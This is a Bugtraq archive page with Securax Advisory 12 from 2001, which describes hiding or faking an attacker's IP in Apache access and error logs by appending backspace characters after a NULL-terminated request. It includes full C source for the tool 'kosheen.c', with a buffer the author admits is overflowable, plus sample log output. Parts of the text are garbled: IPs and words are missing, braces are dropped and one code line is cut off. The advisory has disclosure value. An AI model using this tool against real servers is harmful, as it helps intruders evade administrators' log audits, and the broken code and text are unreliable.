Home page logo

bugtraq logo Bugtraq mailing list archives

Securax Advisory 12
From: incubus <incubus () SECURAX ORG>
Date: Mon, 1 Jan 2001 15:51:38 +0100

Securax-SA-12                                               Security
Topic:          Remote hiding from access_log and error_log
Announced:      2000-12-28
Affects:        Logfile auditing with tools that print the contents of the
                file to the screen.

 Note: This  entire  advisory has been based upon trial and error results.
       can not ensure the  information below is 100% correct.  This
       is subject to change without prior notice.

       If you happen to find more information, solutions, ... about the
       problem  or further  varients please contact me on the following
       incubus () securax org, or you can contact the  Securax crew by e-mail
       info () securax org 

 I.  Problem Description

 When the backspace charachter is sent,  after a NULL terminated request,
 will get a answer,  the page we requested,  but our entry in the
 file is kinda altered. We can overwrite our IP address when someone wantsto
 cat the logfile to the screen or maybe also to a device (such as:
 althougt..  this cat to 'devices' thing is not tested by me, but will
 ever print his entire access_log? I don't think so.

 So,  this can only be done when some site administrator is checking his
 with 'cat' or 'tail' or such, which is often used in addition with grep.


  [incubus:~]$ nc 80
  GET /index.php HTTP/1.0
  content (output) of index.php

  [incubus:~]$ ./localghost index.php
  content (output) of index.php

 Hmm.. not very interesting eh? Well, let's take a look at the webserver's

  [root () test logs]# tail -n 1 access_log - - [27/Dec/2000:04:42:26 +0100] "GET /index.php HTTP/1.0" 200
   /* is the IP of the attacker */

  [root () test logs]# tail -n 1 access_log - - [31/Feb/1492:01:23:45 +3133] "GET /index.htm HTTP/1.1" 200

 Unfortunaltely, if you open access_log in any decent editor, it will notice
 the '\x08' chars ( \x08 == backspace), and display 'em as dots.

 If you want to display a fake ip address, you'll have to calculate the
 of the entry in the log file. I suggest you keep the fake ipaddress as
 as can be, because is more suspicious than, let's say

 II. Impact

 This is not really a vulnerability, but it can be used in cgi scanners
 or something, i don't know.  This source was coded and compiled on a
 slack7 linux (2.2.17) box, and tested against a Apache 1.3.14 server.

 /* --| BOF |-- */

    kosheen.c - hides you from logfiles
    "i'll hide you, away from danger"; -kosheen, 2000

    This will display false values in a remote site's access_log
    and error_log.  Read Securax Advisory #12 for more info.

    Got the title of this source from the radio, and guess what song
    they were playing. :)

    All my love to Tessa.
    Maximum respect to vorlon, cicero, root-dude, lamagra, f0bic, Zoa,
    zymo, sentinel, woshy, bob, suPC, uptx, and all great ppl i forgot...

   <incubus () securax org>

 #include <stdio.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <netdb.h>
 int usage(char *progname);
 int main(int argc, char **argv){
    int sock, i;
    char buf[4096];  /* change this value !! */
    struct sockaddr_in sin;
    struct hostent *he;
    if (argc < 3) usage(argv[0]);
    if ((he=gethostbyname(argv[1])) == NULL){
 fprintf(stderr, "Unknown host\n\n");
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) herror("oops: ");
    sin.sin_family = AF_INET;
    sin.sin_addr = *((struct in_addr *)he->h_addr);
    sin.sin_port = htons(80);
    bzero(buf, sizeof(buf));
    strncpy (buf,"GET /", 5);
    strcat (buf, argv[2]);  /* okay.. overflow this buffer and get a
                               errm.. crappy non-suid shell!  :)
          So, don't mailbomb me this is overflowable */

    strncat (buf," HTTP/1.0\x00", 14);
    for (i=0; i< 600; i++) strncat(buf,"\x08", 1); /* change the 600
                                                      if you are using
            quiet large url's */
    Uncomment next line (and change) if you want a fake address displayed
    strcat (buf," - - [31/Feb/1492:01:23:45 +3133] \"GET /index.htm

    strncat (buf,"\r\n\r\n", 4);
    if (connect(sock,(struct sockaddr *) &sin ,sizeof(sin)) < 0){
        herror("connect() failed\n");
    send(sock, buf, sizeof(buf), 0);
    recv(sock, buf, sizeof(buf), 0);
    printf ("%s", buf);

 int usage(char *progname)
    fprintf (stderr, "\nHmm.. Better use it like this: \n");
    fprintf (stderr, "\t%s <server> <page>\n", progname);
    fprintf (stderr, "\tWhere: <server> is the hostname.\n\t       ");
    fprintf (stderr, "<page> is the file you want.\n");
    fprintf (stderr, "  by incubus\n   <incubus () securax org>\n");

 /* --| EOF |-- */

 III. possible workarounds

 possible workarounds :: - Don't use 'cat' and 'tail' (and similars) for
                           logfile checking, but a good editor.

 IV credits
 As mentioned in the .c file:
 Tessa, vorlon, cicero, zoa, F_F, rootdude, t-omicr0n, toshywoshy, segfault,
 f0bic, lamagra, steven, zymot1c, sentinel, [--bob--], alien, axxess, telar,
 prizm, {} and devilish.

 Also greets to the many, many people i forgot to mention.

 hmm.. kinda thanks to the people of kosheen for the name.  :)

 incubus (incubus () securax org).

 For more information
incubus () securax org

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]